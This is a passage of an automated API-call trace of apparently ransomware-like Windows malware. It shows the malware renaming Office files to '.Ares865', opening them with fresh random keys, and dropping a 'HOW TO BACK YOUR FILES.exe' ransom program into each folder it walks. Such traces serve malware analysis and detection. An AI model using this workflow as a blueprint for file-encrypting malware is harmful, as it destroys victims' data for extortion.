"c:\\program files\\microsoft office\\office14\\accwiz\\acwzmain.accde.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0072.292] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=9404416) returned 1 [0072.293] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0072.293] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0072.293] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0072.530] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0072.533] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0072.533] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0072.569] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZTOOL.ACCDE.Ares865") returned 72 [0072.569] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZTOOL.ACCDE" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwztool.accde"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZTOOL.ACCDE.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwztool.accde.ares865"), dwFlags=0x1) returned 1 [0072.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZTOOL.ACCDE.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwztool.accde.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0072.574] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=11767808) returned 1 [0072.574] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0072.610] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0072.610] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.030] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.031] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.031] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.057] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb") returned="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb" [0073.057] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0073.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0073.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb") returned 52 [0073.058] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb") returned="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb" [0073.058] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.058] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\accessweb\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.082] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.082] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5d0f5bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d0f5bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.082] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.082] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.082] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\3082", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\3082") returned="C:\\Program Files\\Microsoft Office\\Office14\\3082" [0073.082] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f21d0 | out: hHeap=0x2b0000) returned 1 [0073.082] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0073.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\3082") returned 47 [0073.083] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\3082" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\3082") returned="C:\\Program Files\\Microsoft Office\\Office14\\3082" [0073.083] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.083] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\3082\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\3082\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.087] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.087] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\3082\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a4f390, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5d11bd20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d11bd20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.087] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.087] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.088] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1036", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1036") returned="C:\\Program Files\\Microsoft Office\\Office14\\1036" [0073.088] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2168 | out: hHeap=0x2b0000) returned 1 [0073.088] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0073.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1036") returned 47 [0073.088] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1036" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1036") returned="C:\\Program Files\\Microsoft Office\\Office14\\1036" [0073.088] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.088] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1036\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1036\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.092] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.092] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1036\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x779e270, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5d11bd20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d11bd20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.092] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.092] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.092] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033" [0073.092] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2100 | out: hHeap=0x2b0000) returned 1 [0073.092] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0073.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033") returned 47 [0073.092] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033" [0073.093] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.093] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.096] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.096] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d11bd20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d11bd20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.097] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.097] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.099] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CT_ROOTS.XML.Ares865") returned 68 [0073.099] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CT_ROOTS.XML" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ct_roots.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CT_ROOTS.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ct_roots.xml.ares865"), dwFlags=0x1) returned 1 [0073.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CT_ROOTS.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ct_roots.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0073.100] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=6069) returned 1 [0073.100] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.101] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.101] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.104] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.104] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.104] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.107] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBSAMPLE.MDB.Ares865") returned 68 [0073.107] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBSAMPLE.MDB" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbsample.mdb"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBSAMPLE.MDB.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbsample.mdb.ares865"), dwFlags=0x1) returned 1 [0073.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBSAMPLE.MDB.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbsample.mdb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0073.109] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=483328) returned 1 [0073.109] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0073.110] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.110] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0073.129] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0073.130] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.130] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0073.146] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OCCMPVRD.XML.Ares865") returned 68 [0073.146] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OCCMPVRD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\occmpvrd.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OCCMPVRD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\occmpvrd.xml.ares865"), dwFlags=0x1) returned 1 [0073.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OCCMPVRD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\occmpvrd.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0073.148] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1128) returned 1 [0073.149] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0073.149] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.149] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0073.153] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0073.154] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.154] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0073.155] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OCMODVRD.XML.Ares865") returned 68 [0073.155] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OCMODVRD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ocmodvrd.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OCMODVRD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ocmodvrd.xml.ares865"), dwFlags=0x1) returned 1 [0073.156] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OCMODVRD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ocmodvrd.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0073.156] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1068) returned 1 [0073.156] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0073.157] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.157] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0073.159] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0073.160] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.160] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0073.175] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDCMPVRD.XML.Ares865") returned 68 [0073.176] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDCMPVRD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wdcmpvrd.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDCMPVRD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wdcmpvrd.xml.ares865"), dwFlags=0x1) returned 1 [0073.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDCMPVRD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wdcmpvrd.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0073.178] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1401) returned 1 [0073.178] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0073.179] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.179] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0073.181] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0073.182] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.182] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0073.185] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir" [0073.185] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0073.185] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0073.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir") returned 53 [0073.185] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir" [0073.185] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.185] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\vsdir\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.190] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.190] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x504da6a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x5d200560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d200560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.190] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.190] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.190] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles" [0073.190] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1708 | out: hHeap=0x2b0000) returned 1 [0073.190] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2620 | out: hHeap=0x2b0000) returned 1 [0073.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles") returned 59 [0073.190] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles" [0073.190] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.190] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.195] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.195] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e3382f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5d2266c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d2266c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.195] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.195] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.196] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR" [0073.196] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1408 | out: hHeap=0x2b0000) returned 1 [0073.196] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0073.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR") returned 56 [0073.196] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR" [0073.196] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.196] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), 